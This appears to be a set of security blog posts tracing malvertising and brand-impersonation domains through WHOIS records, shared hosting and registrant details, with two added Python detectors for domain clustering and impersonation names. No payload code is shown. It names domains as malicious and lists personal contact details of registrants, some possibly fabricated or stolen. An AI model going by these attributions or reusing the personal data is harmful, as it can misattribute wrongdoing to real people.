http://www.virustotal.com/analisis/fbf39bcd9dea6e1233895e391c2d4bab22096cf7b76b8a6b760203f3d0efa76d-1252662476

Domain information

ad.trendbanner.com
ICANN REGISTRAR: GODADDY.COM, INC
Created 30 July 2009
NS47.DOMAINCONTROL.COM
NS48.DOMAINCONTROL.COM

IP: 161.58.56.25 and 207.57.97.233

Shares IP with doityourselfbuilder.com and banner.islandbanner.com

Registrant:
Modena Inc (domains@modenainc.com) (associated with 102 domains)
921 SW Washington ST
Suite 228
Portland, Oregon 97205
United States

Modena Inc have a dubious history, with complaints as far back as 2005 about "spyware infested filesharing programs", site scraping and 302 domain poisoning:

http://www.freedomcrowsnest.org/forum/viewtopic.php?t=1416
http://forum.abestweb.com/showthread.php?p=456066&mode=threaded#post456066

Modena Inc domains were also part of the malvertizing incident that hit digitalspy.co.uk:
http://msmvps.com/blogs/spywaresucks/archive/2009/07/22/1704910.aspx

There is also a dishonorable mention at bluetack.co.uk (**10** different security exploits were used in that incident) - domains used were banners.exitexchange.com and count.exit1208.com:
http://www.bluetack.co.uk/forums/index.php?showtopic=18064&st=210&p=90509&

It is interesting that ashoping.com was part of the incident recorded at bluetack.co.uk. The registrant, helen.nikolson@gmail.com, has been seen myriad times, in association with traffichunters.net (which we can tie to Innovative Marketing in the Ukraine):
http://msmvps.com/blogs/spywaresucks/archive/2009/03/27/1682054.aspx

*****

doityourselfbuilder.com
ICANN Registrar: MELBOURNE IT, LTD D/B/A INTERNET NAMES WORLDWIDE
Created 10 June 2006
NS1.SECURE.NET
NS2.SECURE.NET

Registrant:
Music Unlimited Inc
PO Box 1200
Jacksonville 97530

Admin Name:
David Sprunger (pptorders@playpianotoday.com)

*****

banner.islandbanner.com
ICANN Registrar: GODADDY.COM, INC
Created 24 July 2009
NS45.DOMAINCONTROL.COM
NS46.DOMAINCONTROL.COM

IP: 68.178.232.100 (shares IP with 11,039,738 other sites; a mass-shared parking address, so co-hosting here is not evidence of a link)

Registrant:
Modena Inc (domains@modenainc.com) (associated with 102 domains)
921 SW Washington Street
Suite 228
Portland, Oregon 97205

*****

pussbanner769.info
ICANN Registrar: GODADDY.COM, INC
Created 7 August 2009
NS47.DOMAINCONTROL.COM
NS48.DOMAINCONTROL.COM

IP: 68.178.232.100 (shares IP with 11,039,738 other sites; a mass-shared parking address, so co-hosting here is not evidence of a link)

Registrant:
Domain Owner (trafficbuyer@gmail.com)
15156 SW 5th
Scottsdale
Arizona 85260
Tel: +1 8005551212

*****

blackwater-cuprumworks.net
ICANN Registrar: DIRECTI
Created 7 September 2009
NS1.EVERYDNS.NET
NS2.EVERYDNS.NET

IP: 213.155.2.112 - Namibia, Grinvich3, Vladimir Gubarenko

Shares IP with the domains aw-work.net, awirons-work.com, sexamateur-hartcore.com and sleazy-dreamers.net

Registrant:
Eduard Skobelev (eddiscobbi3@gmail.com)
ul. Starinskaya, d.1, kv. 92
g. Moskva
g. Moskva, 107009
RU
Tel: +7 4952243948

*****

masterwood-works.com
ICANN Registrar: NETWORK SOLUTIONS, LLC.
Created 19 February 1999
NS.WVT.NET
NS2.WVT.NET

IP: 65.36.167.73 - Delaware, Newark, Hostmysite

Shares IP with 395 other sites

Registrant:
Master Wood-Works
4526 Olentangy River Road
Delaware, OH 43015
US

Admin:
Steve Krengel (hostmaster@wvt.net)

*****

bintus-bahi.cn
ICANN Registrar: Chinese
Created 15 August 2009
NS1.EVERYDNS.NET
NS2.EVERYDNS.NET
NS3.EVERYDNS.NET
NS4.EVERYDNS.NET

IP: 61.235.117.72 - Guangdong, Shenzen, China Railcom Guangdong Shenzhen Subbranch

Registrant:
Cehhost, inc (owns about 84 other domains)
Lucas Steven (steven_lucas_2000@yahoo.com)


Alert: please treat content from kennedales.com with extreme caution


I have received information that kennedales.com has been implicated in a malvertizing incident.

I noted in my last blog post that kennedales.com shares an IP address with two other domains that have already been caught facilitating malvertizing, but at that time I had not received intelligence indicating that kennedales.com was also involved.

Now we know that it is.

Posted by sandi with no comments

Another two bad domains: newadsresults.com and waveadvert.com

Seen distributing malvertizing at starnewsonline.com:
http://forums.starnewsonline.com/eve/forums/a/tpc/f/6431032365/m/7121097019/r/9841029019

And collegehumor.com:
http://www.facebook.co.za/CollegeHumor

And tigerdroppings.com:
http://www.tigerdroppings.com/rant/messagetopic.asp?p=14780012&pg=1

And basilmarket.com (page doesn't load, but you can find it in Google cache):
http://www.basilmarket.com/forum/1184277/2

newadsresults.com
ICANN Registrar: BIZCN.COM, INC.
Created 21 July 2009
NS1.EVERYDNS.NET
NS2.EVERYDNS.NET

IP: 212.117.166.69 (Luxembourg, Root Esolutions)

Shares IP with two other domains, kennedales.com and waveadvert.com

Registrant:
RJ
Rita Johnson (ritaj@gmail.com)
4122082301 fax: 4122082301
101 Bellevue Road
Pittsburgh PA 15229
US

*****

kennedales.com
ICANN Registrar: BIZCN.COM, INC
Created 14 August 2009
NS1.EVERYDNS.NET
NS2.EVERYDNS.NET

IP: 212.117.166.69 (Luxembourg, Root Esolutions)

Registrant:
kennedales.com
Jonathan Nelson (admin@kennedales.com)
812-750-2673 fax: 812-750-2673
1370 Heliport Loop
Bloomington IN 47404
US

*****

waveadvert.com
ICANN Registrar: BIZCN.COM, INC.
Created 4 August 2009
NS1.EVERYDNS.NET
NS2.EVERYDNS.NET

IP: 212.117.166.69 (Luxembourg, Root Esolutions)

Registrant:
Premier ANC
Linda Hogan (lindahg@yahoo.com)
6788081308 fax: 6788081308
4495 Atlanta Hwy
Atlanta GA 30052
US

Note waveadvert.com’s involvement in malvertizing incidents at blogspot.com:
http://google.com/safebrowsing/diagnostic?site=waveadvert.com/&hl=en-gb

And a problem at mangafox:
http://forums.mangafox.com/showthread.php?p=2507674

Posted by sandi with 2 comment(s)

ALERT: The gogomediacenter.com incidents continue


I have a few more domains for you…

mediadison.com
ICANN Registrar: BIZCN.COM, INC
Created 6 July 2009

IP: 212.117.166.77, Luxembourg, Root Esolutions

Sharing IP with the following domains, all of which should be treated with extreme caution:

2ez4clicks.com, denrifiox.com, monsteradhost.com, newage-advertising.com, profitgainerz.com, ranparetc.com, s7atwola.com, scheuvronts.com, smartadvertisment.net, westernadrix.com

Registrant:
Solaris Co
Jack Thompson (jthompson@yahoo.com)
4049422100 fax: 4049422100
1921 Monroe Drive
Atlanta GA 30324

stopdrugstoday.cn
ICANN Registrar (Chinese)
Created 1 September 2009

IP: 83.133.126.155 - Germany, Lncde-greatnet-newmedia

Registrant administrative email: webmaster@tangodance.cn

By the way, we should revisit gogomediacenter.com - there have been some changes since I last posted with some new domains appearing at its IP address:

gogomediacenter.com
ICANN Registrar: BIZCN.COM, INC
Created 26 August 2008

IP: 212.117.166.75 - Luxembourg, Root Esolutions

Shares IP with the domains bestmediamind.com, fastdns-ms7.com, jetfastads.com, pro-drugstore.com, query2feed.com, tdshosterserv8.com and yakaboopromo.com (all domains should be treated with extreme caution).

Registrant:
Mediaswan
Frank Roberts (frank@mailqueen.com)
2128054649 fax: 2128054649
2130 Small Street
New York, NY 10007

Posted by sandi with no comments

What can I say … but…

Ouch.  I haven’t seen a mess this bad since IE7 first came out in beta… (yes, IE8’s Compatibility View fixes the display issues).

[images]

Posted by sandi with no comments

ALERT: Please treat the domains gogomediacenter.com, sys17media.com and praharesorts.cn with extreme caution

Skechers malvertizement

It is very interesting to watch the modus operandi that the bad guys are using change.

This malvertizement was NOT seen on a web page; rather it was being displayed by an advertising supported freeware application.

The trouble starts when an ad.yieldmanager.com GET retrieves content, in an iframe, from the domain "gogomediacenter.com".  The content served up by gogomediacenter.com is an innocent "skechers” JPG (which is the advertisement itself), but it also serves up a little something extra...

[image]

Note the two areas of code highlighted by the arrows. I find it interesting that the miscreants are going to the trouble of using some (basic) encoding.

If we decode the script at the end, we get this:

[image]

Again, there is a little bit of (basic) encoding to get rid of, which leaves us with this:

[image]

Another interesting thing to note about this particular incident is that the malicious code only seems to appear once per IP address. If I nuke the sandbox I am using, the redirect does not recur, but if I change my IP address, then I can reproduce the redirect as often as I wish.

Ok, so let’s take a look at these new domains, gogomediacenter.com, sys17media.com and praharesorts.cn. I think we can say that Root Esolutions, Luxembourg is turning into a bit of a cesspool, and yes, it is the same IP range as the domains revealed in my earlier blog post :(

gogomediacenter.com
ICANN Registrar: BIZCN.COM, INC
Created 26 August 2008

IP: 212.117.166.75 - Luxembourg, Root Esolutions

Shares IP with the domains bestmediamind.com, pro-drugstore.com and yakaboopromo.com (all domains should be treated with extreme caution).

Registrant:
Mediaswan
Frank Roberts (frank@mailqueen.com)
2128054649 fax: 2128054649
2130 Small Street
New York, NY 10007

sys17media.com
ICANN Registrar: BIZCN.COM, INC
Created 2 September 2009

IP: 212.117.166.70 - Luxembourg, Root Esolutions

Shares IP with the domains doubleclick-ssl.com and verilline.com (both domains should be treated with extreme caution).

Registrant:
DNS Admin (d71245@registar.com)
580-433-9026 fax: 580-433-9026
2654 Cody Ridge Rd
Clinton OK 73601

praharesorts.cn
ICANN Registrar (Chinese)
Created 28 August 2009

IP: 83.133.126.155 - Lncde-greatnet-newmedia, Germany

Administrative email: webmaster@seniorstuds.com.ar (no such domain)

bestmediamind.com
ICANN Registrar: BIZCN.COM, INC
Created 26 June 2009

IP: 212.117.166.75 - Luxembourg, Root Esolutions

Registrant:
Bob Robertson (bobrobertsonscmpbst@gmail.com)
6172679396
159 Newbury Street
Boston, MA 02116

yakaboopromo.com
ICANN Registrar: BIZCN.COM, INC
Created 26 June 2009

IP: 212.117.166.75 - Luxembourg, Root Esolutions

Registrant:
John Robertson (johnrobertsoncmpbst@gmail.com)
6172679396
159 Newbury Street
Boston MA 02116

pro-drugstore.com
ICANN Registrar: ENOM, INC
Created 29 January 2009

IP: 212.117.166.75 - Luxembourg, Root Esolutions

Registration service contact director@climbing-games.com (regular readers of this blog will recognise that email address)

Registrant:
Jack Hum (no email)
208 W. 1st St. CA 90012
Los Angeles 90012
Tel: +1 2338824832

doubleclick-ssl.com
ICANN Registrar: BIZCN.COM, INC
Created 20 August 2009

IP: 212.117.166.70 - Luxembourg, Root Esolutions

Registrant:
doubleclick-ssl.com
Carolyn Hooley (carolyn@doubleclick-ssl.com)
845-223-3913 fax: 845-223-3913
4619 Camdem Place
Lagrangeville NY 12540

verilline.com
ICANN Registrar: BIZCN.COM, INC
Created 29 July 2009

IP: 212.117.166.70 - Luxembourg, Root Esolutions

Registrant:
Lithpro Co
Linda Thompson (info@lithpro.com)
3037989467 fax: 3037989467
2600 W 104th Ave
Boston CO 80234
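The pivots used throughout these posts (shared IP, same /24 at Root Esolutions, the same phone number behind "Bob" and "John" Robertson, a burst of registrations at one registrar over a few weeks) can be run mechanically once the WHOIS and hosting data is in a table. This is an added example, not code from the original post; the records are transcribed from the listings in these posts, with the long-established masterwood-works.com included as a control that should not cluster with the rest. The 60-day burst window is an assumption.

```python
"""Pivot WHOIS/hosting records the way the post does: group domains that
share an IP, sit in the same /24, reuse a registrant phone number, or were
registered in a burst inside one network.  Added example; the records are
transcribed from the post's own listings (phone digits only, .cn registrar
unknown), and the 60-day window is an assumption."""
import ipaddress
from collections import defaultdict, namedtuple
from datetime import date

Record = namedtuple("Record", "domain ip registrar created phone email")

RECORDS = [
    Record("gogomediacenter.com", "212.117.166.75", "BIZCN.COM, INC", date(2008, 8, 26), "2128054649", "frank@mailqueen.com"),
    Record("bestmediamind.com", "212.117.166.75", "BIZCN.COM, INC", date(2009, 6, 26), "6172679396", "bobrobertsonscmpbst@gmail.com"),
    Record("yakaboopromo.com", "212.117.166.75", "BIZCN.COM, INC", date(2009, 6, 26), "6172679396", "johnrobertsoncmpbst@gmail.com"),
    Record("pro-drugstore.com", "212.117.166.75", "ENOM, INC", date(2009, 1, 29), "2338824832", None),
    Record("sys17media.com", "212.117.166.70", "BIZCN.COM, INC", date(2009, 9, 2), "5804339026", "d71245@registar.com"),
    Record("doubleclick-ssl.com", "212.117.166.70", "BIZCN.COM, INC", date(2009, 8, 20), "8452233913", "carolyn@doubleclick-ssl.com"),
    Record("verilline.com", "212.117.166.70", "BIZCN.COM, INC", date(2009, 7, 29), "3037989467", "info@lithpro.com"),
    Record("mediadison.com", "212.117.166.77", "BIZCN.COM, INC", date(2009, 7, 6), "4049422100", "jthompson@yahoo.com"),
    Record("newadsresults.com", "212.117.166.69", "BIZCN.COM, INC", date(2009, 7, 21), "4122082301", "ritaj@gmail.com"),
    Record("kennedales.com", "212.117.166.69", "BIZCN.COM, INC", date(2009, 8, 14), "8127502673", "admin@kennedales.com"),
    Record("waveadvert.com", "212.117.166.69", "BIZCN.COM, INC", date(2009, 8, 4), "6788081308", "lindahg@yahoo.com"),
    Record("praharesorts.cn", "83.133.126.155", None, date(2009, 8, 28), None, "webmaster@seniorstuds.com.ar"),
    Record("stopdrugstoday.cn", "83.133.126.155", None, date(2009, 9, 1), None, "webmaster@tangodance.cn"),
    # Control: a 1999-vintage domain on unrelated hosting; should stay alone.
    Record("masterwood-works.com", "65.36.167.73", "NETWORK SOLUTIONS, LLC.", date(1999, 2, 19), None, "hostmaster@wvt.net"),
]


def network_of(ip, prefixlen=24):
    """'212.117.166.75' -> '212.117.166.0/24'."""
    return str(ipaddress.ip_network(f"{ip}/{prefixlen}", strict=False))


def groups_by(records, keyfunc):
    """Group domain names by keyfunc, keeping only keys shared by 2+ domains."""
    groups = defaultdict(list)
    for r in records:
        key = keyfunc(r)
        if key is not None:
            groups[key].append(r.domain)
    return {k: v for k, v in groups.items() if len(v) > 1}


def shared_ip(records):
    return groups_by(records, lambda r: r.ip)


def shared_prefix(records, prefixlen=24):
    return groups_by(records, lambda r: network_of(r.ip, prefixlen))


def shared_contact(records):
    """Same registrant phone behind different names is the post's strongest link."""
    return groups_by(records, lambda r: r.phone)


def registration_bursts(records, window_days=60, prefixlen=24):
    """Within each /24, chain registrations that are at most window_days apart;
    return every chain of 2+ domains, oldest first."""
    nets = defaultdict(list)
    for r in records:
        nets[network_of(r.ip, prefixlen)].append(r)
    bursts = []
    for recs in nets.values():
        recs.sort(key=lambda r: (r.created, r.domain))
        cluster = [recs[0]]
        for prev, cur in zip(recs, recs[1:]):
            if (cur.created - prev.created).days <= window_days:
                cluster.append(cur)
            else:
                if len(cluster) > 1:
                    bursts.append([r.domain for r in cluster])
                cluster = [cur]
        if len(cluster) > 1:
            bursts.append([r.domain for r in cluster])
    return bursts


if __name__ == "__main__":
    print("same IP:      ", shared_ip(RECORDS))
    print("same /24:     ", shared_prefix(RECORDS))
    print("same phone:   ", shared_contact(RECORDS))
    print("reg. bursts:  ", registration_bursts(RECORDS))
```

On these records the burst detector isolates the nine 212.117.166.x domains registered between 26 June and 2 September 2009 as one campaign, leaves the 2008 gogomediacenter.com and the January pro-drugstore.com as earlier arrivals on the same hosting, and never touches the control domain.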

Posted by sandi with no comments

ALERT: Impersonation of legitimate advertising networks and companies

This investigation began after I was alerted to the fact that somebody has been posing as a Vonage representative, and using the domain vonage-inc.com while doing so.

The domain vonage-inc.com was created on 5 August 2009, and the ICANN Registrar is BIZCN.COM, Inc.  It is hosted by Root Esolutions, Luxembourg (IP address 212.117.166.71).

Registrant details:

Vonage-Inc
Domain Administrator (itadmin@vonage-inc.com)
7322643911 fax 7322643911
4 South Holmdel Road
Holmdel NJ 07733

Interestingly, it looks like Vonage may have already taken control of vonage-inc.com. domaintools.com reports that vonage-inc.com has an IP address of 212.117.166.71 and uses the name servers NS1.EVERYDNS.NET and NS2.EVERYDNS.NET, whereas Robtex reports that vonage-inc.com no longer has an IP address and is using the name servers dns-auth-00.kewr0.s.vonagenetworks.net, dns-auth-00.kiad0.s.vonagenetworks.net, dns-auth-00.klax1.s.vonagenetworks.net and dns-auth-00.klga1.s.vonagenetworks.net. (One of the two sources is presumably serving cached data; a live NS query against the .com servers would settle it.)

My grateful thanks go to the gentleman who alerted me to the goings-on involving vonage-inc.com. His alert has led to the exposure of several other domains that could also be used to impersonate legitimate companies.

Several other domains can be found at the same IP address that vonage-inc.com was using (212.117.166.71). All of them should be treated with extreme caution. Bearing in mind the warning that somebody has been posing as a Vonage representative while using the domain vonage-inc.com, I think it is safe to assume that somebody is planning to pose as (or is already posing as) a representative of Adconion, Carat, Fox Media, Lacoste, Orange or Pubmatic.

Here are details of other domains at IP 212.117.166.71 as at time of writing.  All but one are redirecting visitors to other, legitimate, domains. 

You will note that all of the domains, bar one, have the same ICANN Registrar, being BIZCN.COM, INC.

adconion-inc.com
ICANN Registrar: BIZCN.COM, Inc
Created 10 Aug 2009
Registrant:
adconion-inc.com
IT Admin (admin@adconion-inc.com)
498951490701 fax: 498951490701
Bayerstrasse 41
Muenchen Bavaria 80335

adconion-inc.com is currently redirecting visitors to the legitimate domain adconion.com (IP 89.110.133.18, ICANN Registrar Ascio Technologies, Inc, Registrant address Lindwurmstr.114, Muenchen, Bavaria 80337)

*****

adjimbo.com
ICANN Registrar: BIZCN.COM, Inc.
Created 9 June 2009

Registrant:
Registar services Co
Jack Omands (jacksosomands@gmail.com)
352691787
10 rue Large
Luxembourg Luxembourg 1918

Address as per web site: 260 Peachtree street, Suite 2200, Atlanta, Georgia 30303, US

Note: 260 Peachtree Street, Suite 2200, is a Regus property. Regus operates business centres, virtual offices, virtual PAs etc.

*****

carat-inc.com
ICANN Registrar: BIZCN.COM, INC
Created 10 August 2009

Registrant:
Carat-inc.com
IT Administrator (admin@carat-inc.com)
441179045055 fax: 441179045055
90 Great Portland Street
London London W1W 5QZ

carat-inc.com is currently redirecting visitors to the legitimate domain carat.com (IP 91.206.177.56, Aegis Group Plc, UK - ICANN Registrar GROUP NBT PLC AKA NETNAMES, Registrant: Aegis Group plc, 180 Great Portland Street, London W1W 5QZ)

*****

foxinteractivemedia-inc.com
ICANN Registrar: BIZCN.COM, INC
Created 10 August 2009

Registrant:
domain admin (admin@foxinteractivemedia-inc.com)
3102750087 fax: 3102750087
424 N. Beverly Dr
Beverly Hills CA 90210

foxinteractivemedia-inc.com is currently redirecting visitors to the legitimate domain fox.com (IP 80.67.66.57, Akamai Technologies, ICANN Registrar MARKMONITOR, INC, Registrant address: Intellectual Property Department, Twentieth Century Fox Film Corporation, PO Box 900, Beverley Hills CA 90213-0900)

*****

lacoste-ads.com (note, we have encountered lacoste-ads.com before, as discussed here:
http://msmvps.com/blogs/spywaresucks/archive/2009/04/23/1690197.aspx)
ICANN Registrar: NETFIRMS, INC
Created 2 March 2009
Registrant details hidden behind a WHOIS privacy protection service (Domain Privacy Group)

lacoste-ads.com is currently redirecting visitors to the legitimate domain lacoste.com (IP 199.93.55.126, ICANN Registrar Core Internet Council of Registrars, Registrant VIAL TRIBOULET catherine, Lacoste S.A., 8 rue de Castiglione, Paris)

*****

orangeadvertising-inc.com
ICANN Registrar: BIZCN.COM, INC
Created 10 August 2009

Registrant:
Orangeadvertising
Network Administrator: admin@orangeadvertising.us
441179045053 fax: 441179045053
6400 North Radcliffe St
Bristol Bristol BS9 4AU
GB

orangeadvertising-inc.com is currently redirecting visitors to the legitimate domain orange.com (IP 194.2.208.16, Telecom France, Registrant: Orange Personal Communications Services Limited, St James Court, Great Park Road, Almondbury Park, Bradley Stoke, Bristol, UK, Tel: )

Note: the domain orangeadvertising.us (used for the Network Administrator's contact email address) has never been registered.

*****

pubmatic-inc.com
ICANN Registrar: BIZCN.COM, INC
Created 10 August 2009

Registrant:
IT Admin (itadmin@pubmatic-inc.com)
6508562386 fax: 6508562386
675 El Camino Real
Palo Alto CA 94301

pubmatic-inc.com is currently redirecting visitors to the legitimate pubmatic.com (IP 69.163.146.58, New Dream Network Llc, California, Registrant: Pubmatic, Inc, PO Box 975, Palo Alto, CA 94302)
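Every impersonation domain above follows the same recipe: the brand name with a corporate-looking affix bolted on (-inc, -ads, advertising-inc, and doubleclick-ssl.com from the earlier post). That is easy to watch for in new-registration feeds. This is an added example, not code from the original post; the brand watch-list and the affix list are assumptions, and the observed domains are the ones listed in this post plus the genuine carat.com as a control that must not be flagged.

```python
"""Flag domains that dress a brand name up with a corporate-looking affix
(brand-inc.com, brand-ads.com, brand-ssl.com), the impersonation pattern this
post documents.  Added example, not the post's own code: BRANDS and
DECOY_AFFIXES are assumptions; OBSERVED is the list of domains from the post."""
import re

# Brands the post shows being impersonated (assumed watch-list).
BRANDS = {"adconion", "carat", "foxinteractivemedia", "lacoste", "orange",
          "pubmatic", "vonage", "doubleclick"}
# Tokens a registrant bolts onto a brand to look like its corporate or ad arm,
# longest first so 'advertising' is peeled before anything shorter.
DECOY_AFFIXES = ["advertising", "network", "media", "corp", "inc", "ads", "ssl", "llc"]

# Domains listed in the post, plus the legitimate carat.com as a control.
OBSERVED = ["vonage-inc.com", "adconion-inc.com", "adjimbo.com", "carat-inc.com",
            "foxinteractivemedia-inc.com", "lacoste-ads.com",
            "orangeadvertising-inc.com", "pubmatic-inc.com", "doubleclick-ssl.com",
            "brightadsnetwork.com", "topleanpro.com", "carat.com"]


def registrable_label(domain):
    """'orangeadvertising-inc.com' -> 'orangeadvertising-inc' (assumes a one-label TLD)."""
    parts = domain.lower().strip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def match_brand(domain, brands=BRANDS):
    """Peel decoy affixes off the label; return (brand, affixes_removed) or None.
    A bare brand label (carat.com) is never flagged: nothing was added to it."""
    tokens = [t for t in re.split(r"[-_]", registrable_label(domain)) if t]
    removed = []
    # First drop whole hyphenated tokens from the end: lacoste-ads, vonage-inc.
    while len(tokens) > 1 and tokens[-1] in DECOY_AFFIXES:
        removed.append(tokens.pop())
    core = "".join(tokens)
    # Then peel glued-on affixes: orangeadvertising -> orange.
    while True:
        if core in brands and removed:
            return core, removed
        for affix in DECOY_AFFIXES:
            if core.endswith(affix) and len(core) > len(affix):
                core = core[: -len(affix)]
                removed.append(affix)
                break
        else:
            return None


def scan(domains, brands=BRANDS):
    """Map each flagged domain to the brand it impersonates."""
    hits = {}
    for d in domains:
        m = match_brand(d, brands)
        if m:
            hits[d] = m[0]
    return hits


if __name__ == "__main__":
    for domain, brand in scan(OBSERVED).items():
        print("%-30s impersonates %s" % (domain, brand))
```

This is deliberately strict about requiring an affix to have been removed, so the brand's own registration never trips it; the price is that a plain typo-squat (carrat.com) is out of scope for this check and needs an edit-distance test instead.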

*******************************

Other domains in the same IP range:

IP: 212.117.166.74

brightadsnetwork.com (visually almost identical to adjimbo.com – see above)
Address as per web site: 2115 North Charles Street, North Baltimore
ICANN Registrar: BIZCN.COM, INC
Created 14 June 2009

Registrant:
RegServ Co
Norman Jason (normanjason01223@gmail.com)
2127340192
20 Washington Street
New York New York 10006

topleanpro.com
ICANN Registrar: BIZCN.COM, INC
Created 18 June 2009

Registrant:
Domains Inform Inc
Thomas Kleineberg (thomaskleinebergdomains@gmail.com)
498999216255
Maximillianstrasse 18
Munich Munich 80539

*****

IP: 212.117.166.73

ad-advanced.com (address as per web site is Suite 300, 8875 Hidden River Parkway, Tampa which is a Regus asset)

ICANN Registrar: BIZCN.COM, INC
Created 1 July 2009

Registrant:
Norman Sebring (nsebring@rit-consulting.com)
5116 New Centre Drive
WILMINGTON NC 28403

*****

dnzmg.com (web site address Suite 410, 6802 Paragon Place, Richmond, Virginia - another Regus asset)

ICANN Registrar: BIZCN.COM, INC
Created 1 July 2009

Registrant:
Magnetic Wave
Daryl Lewis (markstein@mwa.com)
3035568550 fax: 3035568550
235 Columbine Street
Denver CO 80206

*****

vertixgroup.com (web site address 3525 Piedmont Road, 7 Piedmont Center, Atlanta - this address is for the HP Business Centre, a member of the Regus Group Network)

ICANN Registrar: BIZCN.COM, INC
Created 1 July 2009

Registrant:
Mark Stein (pholexkapsilow@gmail.com) (Mark Stein again? See Daryl Lewis email above)
2158554688 fax: 2158554688
1202 Market Street
Philadelphia PA 19107

Posted by sandi with 3 comment(s)

ALERT: More malvertizing via Facebook applications?

Last time it was “Human Gifts” (aka Owned) that I wrote about on August 3:
ALERT- Malvertizing on Facebook and gaiaonline.com

This time it is the “We’re Related” application – an incident reported on August 18
http://community.tigranetworks.co.uk/blogs/tim_long/archive/2009/08/18/drive-by-downloads-from-facebook.aspx

And, according to a family member, her web browser’s security filter blocked her web browser from accessing something when playing Bubbletown (I quote: “a big red page came up”).  Something was going on there too.

Posted by sandi with no comments